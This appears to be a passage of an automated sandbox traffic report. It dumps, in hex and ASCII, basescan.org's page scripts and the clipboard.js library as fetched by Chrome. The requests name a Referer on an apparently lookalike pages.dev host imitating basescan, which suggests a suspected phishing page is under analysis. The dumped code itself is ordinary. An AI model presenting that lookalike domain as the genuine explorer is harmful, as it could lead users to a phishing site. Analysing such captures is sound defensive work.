                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC491INData Raw: 76 61 72 20 73 74 72 41 67 65 3d 24 28 22 23 68 64 6e 41 67 65 54 65 78 74 22 29 2e 76 61 6c 28 29 3b 76 61 72 20 73 74 72 44 61 74 65 54 69 6d 65 3d 24 28 22 23 68 64 6e 44 61 74 65 54 69 6d 65 54 65 78 74 22 29 2e 76 61 6c 28 29 3b 76 61 72 20 73 74 72 44 61 74 65 54 69 6d 65 4c 6f 63 61 6c 3d 22 44 61 74 65 20 54 69 6d 65 20 28 4c 6f 63 61 6c 29 22 3b 76 61 72 20 73 74 72 44 61 74 65 54 69 6d 65 4c 6f 63 61 6c 53 68 6f 72 74 3d 22 4c 6f 63 61 6c 22 3b 76 61 72 20 73 74 72 53 69 74 65 4e 61 6d 65 3d 24 28 22 23 68 64 6e 53 69 74 65 4e 61 6d 65 22 29 2e 76 61 6c 28 29 3b 76 61 72 20 73 74 72 41 67 65 54 69 74 6c 65 3d 24 28 22 23 68 64 6e 41 67 65 54 69 74 6c 65 22 29 2e 76 61 6c 28 29 3b 76 61 72 20 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 3d 24
                                                                                                                                                                                                                                              Data Ascii: var strAge=$("#hdnAgeText").val();var strDateTime=$("#hdnDateTimeText").val();var strDateTimeLocal="Date Time (Local)";var strDateTimeLocalShort="Local";var strSiteName=$("#hdnSiteName").val();var strAgeTitle=$("#hdnAgeTitle").val();var strDateTimeTitle=$
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 50 72 69 63 65 3d 24 28 22 23 68 64 6e 47 61 73 50 72 69 63 65 54 65 78 74 22 29 2e 76 61 6c 28 29 3b 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 41 64 42 6c 6f 63 6b 28 29 7b 76 61 72 20 65 6c 65 6d 65 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 65 6c 65 6d 65 6e 74 2e 69 64 3d 22 63 68 65 63 6b 41 64 42 6c 6f 63 6b 22 0a 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 62 61 6e 6e 65 72 5f 61 64 22 3b 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 2e 35 70 78 22 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 6c 65 6d 65 6e 74 29 3b 69 66 28 24 28 22 23 63 68 65 63 6b 41 64 42 6c 6f 63 6b 22 29 2e 77 69 64 74 68 28 29 3e 30 29 7b 72 65 74
                                                                                                                                                                                                                                              Data Ascii: Price=$("#hdnGasPriceText").val();function checkAdBlock(){var element=document.createElement("div");element.id="checkAdBlock"element.className="banner_ad";element.style.width="0.5px";document.body.appendChild(element);if($("#checkAdBlock").width()>0){ret
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 69 63 65 29 3b 24 28 22 2e 73 77 69 74 63 68 2d 74 78 6e 2d 66 65 65 2d 67 61 73 2d 70 72 69 63 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 24 28 22 23 68 64 6e 47 61 73 50 72 69 63 65 54 69 74 6c 65 22 29 2e 76 61 6c 28 29 29 3b 24 28 22 2e 73 68 6f 77 54 78 6e 46 65 65 22 29 2e 68 69 64 65 28 29 3b 24 28 22 2e 73 68 6f 77 47 61 73 50 72 69 63 65 22 29 2e 73 68 6f 77 28 29 3b 7d 0a 69 66 28 21 69 73 44 61 74 61 54 61 62 6c 65 29 7b 72 65 6e 64 65 72 46 6e 54 6f 6f 6c 74 69 70 28 24 28 22 23 6c 6e 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2c 30 29 0a 72 65 6e 64 65 72 46 6e 54 6f 6f 6c 74 69 70 28 24 28 22 2e 73 77 69 74 63 68 2d 74 78 6e 2d 66 65 65 2d 67 61 73 2d 70 72 69 63 65 22 29 2c 30 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 6f 6e 44 61 74 65
                                                                                                                                                                                                                                              Data Ascii: ice);$(".switch-txn-fee-gas-price").attr("title",$("#hdnGasPriceTitle").val());$(".showTxnFee").hide();$(".showGasPrice").show();}if(!isDataTable){renderFnTooltip($("#lnkAgeDateTime"),0)renderFnTooltip($(".switch-txn-fee-gas-price"),0)}}function onDate
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 65 54 69 6d 65 29 3b 7d 0a 65 6c 73 65 20 69 66 28 73 74 72 56 61 6c 3d 3d 73 74 72 44 61 74 65 54 69 6d 65 7c 7c 73 74 72 56 61 6c 3d 3d 73 74 72 44 61 74 65 54 69 6d 65 4c 6f 63 61 6c 29 7b 24 28 22 23 22 2b 64 61 74 61 2e 69 64 29 2e 74 65 78 74 28 73 74 72 41 67 65 29 3b 24 28 22 23 22 2b 64 61 74 61 2e 69 64 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 29 3b 24 28 64 61 74 65 54 69 6d 65 43 6c 61 73 73 29 2e 68 69 64 65 28 29 3b 24 28 61 67 65 43 6c 61 73 73 29 2e 73 68 6f 77 28 29 3b 73 65 74 41 67 65 44 61 74 65 54 69 6d 65 43 6f 6f 6b 69 65 28 73 74 72 41 67 65 29 3b 7d 0a 72 65 6e 64 65 72 46 6e 54 6f 6f 6c 74 69 70 28 24 28 22 23 22 2b 64 61 74 61 2e 69 64 29 2c 31 29 7d 0a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                              Data Ascii: teTime);}else if(strVal==strDateTime||strVal==strDateTimeLocal){$("#"+data.id).text(strAge);$("#"+data.id).attr("title",strDateTimeTitle);$(dateTimeClass).hide();$(ageClass).show();setAgeDateTimeCookie(strAge);}renderFnTooltip($("#"+data.id),1)}functio
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 29 2e 74 65 78 74 28 73 74 72 41 67 65 29 3b 24 28 22 23 6c 6e 6b 49 6e 74 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 29 3b 24 28 22 23 6c 6e 6b 4d 69 6e 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 41 67 65 29 3b 24 28 22 23 6c 6e 6b 4d 69 6e 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 29 3b 24 28 22 23 6c 6e 6b 4d 69 6e 55 6e 63 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 41 67 65 29 3b 24 28 22 23 6c 6e 6b 4d 69 6e 55 6e 63 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65
                                                                                                                                                                                                                                              Data Ascii: ).text(strAge);$("#lnkIntAgeDateTime").attr("title",strDateTimeTitle);$("#lnkMinBlkAgeDateTime").text(strAge);$("#lnkMinBlkAgeDateTime").attr("title",strDateTimeTitle);$("#lnkMinUncAgeDateTime").text(strAge);$("#lnkMinUncAgeDateTime").attr("title",strDate
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 6c 65 22 2c 73 74 72 41 67 65 54 69 74 6c 65 29 3b 24 28 22 23 6c 6e 6b 4c 32 44 65 70 6f 73 69 74 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 44 61 74 65 54 69 6d 65 29 3b 24 28 22 23 6c 6e 6b 4c 32 44 65 70 6f 73 69 74 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 41 67 65 54 69 74 6c 65 29 3b 24 28 22 23 6c 6e 6b 57 64 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 44 61 74 65 54 69 6d 65 29 3b 24 28 22 23 6c 6e 6b 57 64 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 41 67 65 54 69 74 6c 65 29 3b 24 28 22 23 68 64 6e 45 72 63 32 30 22 29 2e 76 61 6c 28 73 74 72 44 61 74 65 54 69 6d 65 29 3b 24 28 61 67 65 43 6c 61 73 73 29
                                                                                                                                                                                                                                              Data Ascii: tle",strAgeTitle);$("#lnkL2DepositAgeDateTime").text(strDateTime);$("#lnkL2DepositAgeDateTime").attr("title",strAgeTitle);$("#lnkWdAgeDateTime").text(strDateTime);$("#lnkWdAgeDateTime").attr("title",strAgeTitle);$("#hdnErc20").val(strDateTime);$(ageClass)
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 54 6f 6f 6c 74 69 70 28 24 28 22 23 6c 6e 6b 44 65 70 6f 73 69 74 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 29 0a 64 69 73 70 6f 73 65 46 6e 54 6f 6f 6c 74 69 70 28 24 28 22 23 6c 6e 6b 4c 32 44 65 70 6f 73 69 74 41 67 65 44 61 74 65 54 69 6d 65 22 29 29 0a 64 69 73 70 6f 73 65 46 6e 54 6f 6f 6c 74 69 70 28 24 28 22 23 6c 6e 6b 57 64 41 67 65 44 61 74 65 54 69 6d 65 22 29 29 0a 76 61 72 20 73 74 72 56 61 6c 3d 24 28 22 23 22 2b 64 61 74 61 2e 69 64 29 2e 74 65 78 74 28 29 3b 69 66 28 73 74 72 56 61 6c 3d 3d 73 74 72 41 67 65 29 7b 24 28 22 23 6c 6e 6b 54 78 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 44 61 74 65 54 69 6d 65 29 3b 24 28 22 23 6c 6e 6b 54 78 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c
                                                                                                                                                                                                                                              Data Ascii: Tooltip($("#lnkDepositBlkAgeDateTime"))disposeFnTooltip($("#lnkL2DepositAgeDateTime"))disposeFnTooltip($("#lnkWdAgeDateTime"))var strVal=$("#"+data.id).text();if(strVal==strAge){$("#lnkTxAgeDateTime").text(strDateTime);$("#lnkTxAgeDateTime").attr("titl
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 44 61 74 65 54 69 6d 65 4c 6f 63 61 6c 29 3b 24 28 22 23 6c 6e 6b 4c 32 44 65 70 6f 73 69 74 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 44 61 74 65 54 69 6d 65 4c 6f 63 61 6c 29 3b 24 28 22 23 6c 6e 6b 57 64 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 44 61 74 65 54 69 6d 65 4c 6f 63 61 6c 29 3b 7d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 6f 6b 65 6e 70 61 67 65 69 66 72 61 6d 65 27 29 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6e 6b 45 72 63 32 30 41 67 65 44 61 74 65 54 69 6d 65 27 29 21 3d 6e 75 6c 6c 29
                                                                                                                                                                                                                                              Data Ascii: tBlkAgeDateTime").text(strDateTimeLocal);$("#lnkL2DepositAgeDateTime").text(strDateTimeLocal);$("#lnkWdAgeDateTime").text(strDateTimeLocal);}if(document.getElementById('tokenpageiframe').contentWindow.document.getElementById('lnkErc20AgeDateTime')!=null)
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 3b 24 28 22 23 6c 6e 6b 4d 69 6e 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 29 3b 24 28 22 23 6c 6e 6b 4d 69 6e 55 6e 63 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 41 67 65 29 3b 24 28 22 23 6c 6e 6b 4d 69 6e 55 6e 63 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 29 3b 24 28 22 23 6c 6e 6b 57 69 74 68 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 74 65 78 74 28 73 74 72 41 67 65 29 3b 24 28 22 23 6c 6e 6b 57 69 74 68 42 6c 6b 41 67 65 44 61 74 65 54 69 6d 65 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65
                                                                                                                                                                                                                                              Data Ascii: ;$("#lnkMinBlkAgeDateTime").attr("title",strDateTimeTitle);$("#lnkMinUncAgeDateTime").text(strAge);$("#lnkMinUncAgeDateTime").attr("title",strDateTimeTitle);$("#lnkWithBlkAgeDateTime").text(strAge);$("#lnkWithBlkAgeDateTime").attr("title",strDateTimeTitle
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 65 44 61 74 65 54 69 6d 65 27 29 2e 74 65 78 74 3d 73 74 72 41 67 65 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 61 6e 73 5f 70 61 67 65 69 66 72 61 6d 65 27 29 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6e 6b 4c 6f 61 6e 41 67 65 44 61 74 65 54 69 6d 65 27 29 2e 74 69 74 6c 65 3d 73 74 72 44 61 74 65 54 69 6d 65 54 69 74 6c 65 3b 24 28 22 23 6c 6f 61 6e 73 5f 70 61 67 65 69 66 72 61 6d 65 22 29 2e 63 6f 6e 74 65 6e 74 73 28 29 2e 66 69 6e 64 28 64 61 74 65 54 69 6d 65 43 6c 61 73 73 29 2e 68 69 64 65 28 29 3b 24 28 22 23 6c 6f 61 6e 73 5f 70 61 67 65 69 66 72 61 6d 65 22 29 2e 63 6f 6e 74 65 6e 74 73 28 29 2e 66 69 6e 64 28 61 67 65 43
                                                                                                                                                                                                                                              Data Ascii: eDateTime').text=strAge;document.getElementById('loans_pageiframe').contentWindow.document.getElementById('lnkLoanAgeDateTime').title=strDateTimeTitle;$("#loans_pageiframe").contents().find(dateTimeClass).hide();$("#loans_pageiframe").contents().find(ageC


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              127192.168.2.549871104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC619OUTGET /assets/vendor/clipboard/dist/clipboard.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              ETag: W/"07653e4b33bd91:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58864
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OsvM1lDsewge5vdV0QBjmGloiJBGpiE6A7QSh1yYoJWGtttVka%2FnNFjE7kuKkvO1ZhHVum%2FmLhMguRqQgqeSlQul%2B8dWiqFHmf87J7tYfMERvZ%2Bb%2FLVOVkoPeiKv7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e8f8f672b6-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC550INData Raw: 32 33 63 65 0d 0a 2f 2a 21 0d 0a 20 2a 20 63 6c 69 70 62 6f 61 72 64 2e 6a 73 20 76 32 2e 30 2e 31 31 0d 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 63 6c 69 70 62 6f 61 72 64 6a 73 2e 63 6f 6d 2f 0d 0a 20 2a 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 c2 a9 20 5a 65 6e 6f 20 52 6f 63 68 61 0d 0a 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                                              Data Ascii: 23ce/*! * clipboard.js v2.0.11 * https://clipboardjs.com/ * * Licensed MIT Zeno Rocha */!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeo
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 28 29 28 74 29 3b 72 65 74 75 72 6e 20 63 28 22 63 75 74 22 29 2c 74 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 76 61 72 20 6e 2c 6f 2c 74 3d 28 6e 3d 74 2c 6f 3d 22 72 74 6c 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 69 72 22 29 2c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 29 2e 73 74 79 6c 65 2e 66 6f 6e 74 53 69 7a 65 3d 22 31 32 70 74 22 2c 74 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 22 30 22 2c 74 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 3d 22 30 22 2c 74 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 22 2c 74 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74
                                                                                                                                                                                                                                              Data Ascii: ()(t);return c("cut"),t};function o(t,e){var n,o,t=(n=t,o="rtl"===document.documentElement.getAttribute("dir"),(t=document.createElement("textarea")).style.fontSize="12pt",t.style.border="0",t.style.padding="0",t.style.margin="0",t.style.position="absolut
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 28 22 63 6f 70 79 22 3d 3d 3d 6e 26 26 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 49 6e 76 61 6c 69 64 20 22 74 61 72 67 65 74 22 20 61 74 74 72 69 62 75 74 65 2e 20 50 6c 65 61 73 65 20 75 73 65 20 22 72 65 61 64 6f 6e 6c 79 22 20 69 6e 73 74 65 61 64 20 6f 66 20 22 64 69 73 61 62 6c 65 64 22 20 61 74 74 72 69 62 75 74 65 27 29 3b 69 66 28 22 63 75 74 22 3d 3d 3d 6e 26 26 28 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 72 65 61 64 6f 6e 6c 79 22 29 7c 7c 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 49 6e 76 61 6c 69 64 20 22 74 61 72 67 65 74 22 20 61 74 74 72 69 62 75 74 65
                                                                                                                                                                                                                                              Data Ascii: ("copy"===n&&e.hasAttribute("disabled"))throw new Error('Invalid "target" attribute. Please use "readonly" instead of "disabled" attribute');if("cut"===n&&(e.hasAttribute("readonly")||e.hasAttribute("disabled")))throw new Error('Invalid "target" attribute
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 6e 20 74 3b 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 7d 28 65 29 3a 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 72 65 74 75 72 6e 28 76 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7d 29 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 29 7b 74 3d 22 64 61 74 61 2d 63 6c 69 70 62
                                                                                                                                                                                                                                              Data Ascii: n t;throw new ReferenceError("this hasn't been initialised - super() hasn't been called")}(e):t}}function v(t){return(v=Object.setPrototypeOf?Object.getPrototypeOf:function(t){return t.__proto__||Object.getPrototypeOf(t)})(t)}function m(t,e){t="data-clipb
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 64 65 66 61 75 6c 74 41 63 74 69 6f 6e 2c 74 68 69 73 2e 74 61 72 67 65 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 74 61 72 67 65 74 3f 74 2e 74 61 72 67 65 74 3a 74 68 69 73 2e 64 65 66 61 75 6c 74 54 61 72 67 65 74 2c 74 68 69 73 2e 74 65 78 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 74 65 78 74 3f 74 2e 74 65 78 74 3a 74 68 69 73 2e 64 65 66 61 75 6c 74 54 65 78 74 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 22 6f 62 6a 65 63 74 22 3d 3d 3d 70 28 74 2e 63 6f 6e 74 61 69 6e 65 72 29 3f 74 2e 63 6f 6e 74 61 69 6e 65 72 3a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 7d 7d 2c 7b 6b 65 79 3a 22 6c 69 73 74 65 6e 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74
                                                                                                                                                                                                                                              Data Ascii: defaultAction,this.target="function"==typeof t.target?t.target:this.defaultTarget,this.text="function"==typeof t.text?t.text:this.defaultText,this.container="object"===p(t.container)?t.container:document.body}},{key:"listenClick",value:function(t){var e=t
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 64 65 6c 65 67 61 74 65 54 61 72 67 65 74 3d 75 28 74 2e 74 61 72 67 65 74 2c 6e 29 2c 74 2e 64 65 6c 65 67 61 74 65 54 61 72 67 65 74 26 26 6f 2e 63 61 6c 6c 28 65 2c 74 29 7d 7d 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 69 2c 72 29 2c 7b 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 69 2c 72 29 7d 7d 7d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 6f 2c 72 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 61 64 64 45 76 65 6e 74 4c 69
                                                                                                                                                                                                                                              Data Ascii: return function(t){t.delegateTarget=u(t.target,n),t.delegateTarget&&o.call(e,t)}}.apply(this,arguments);return t.addEventListener(n,i,r),{destroy:function(){t.removeEventListener(n,i,r)}}}t.exports=function(t,e,n,o,r){return"function"==typeof t.addEventLi
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 65 72 28 72 2c 69 29 7d 29 2c 7b 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 6f 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 72 2c 69 29 7d 29 7d 7d 3b 69 66 28 66 2e 73 74 72 69 6e 67 28 74 29 29 72 65 74 75 72 6e 20 74 3d 74 2c 65 3d 65 2c 6e 3d 6e 2c 6c 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 74 2c 65 2c 6e 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 61 20 53 74 72 69 6e 67 2c 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 2c 20 48 54 4d 4c 43 6f 6c 6c 65 63 74 69 6f 6e 2c 20 6f 72 20 4e 6f 64 65 4c 69 73 74
                                                                                                                                                                                                                                              Data Ascii: er(r,i)}),{destroy:function(){Array.prototype.forEach.call(o,function(t){t.removeEventListener(r,i)})}};if(f.string(t))return t=t,e=e,n=n,l(document.body,t,e,n);throw new TypeError("First argument must be a String, HTMLElement, HTMLCollection, or NodeList
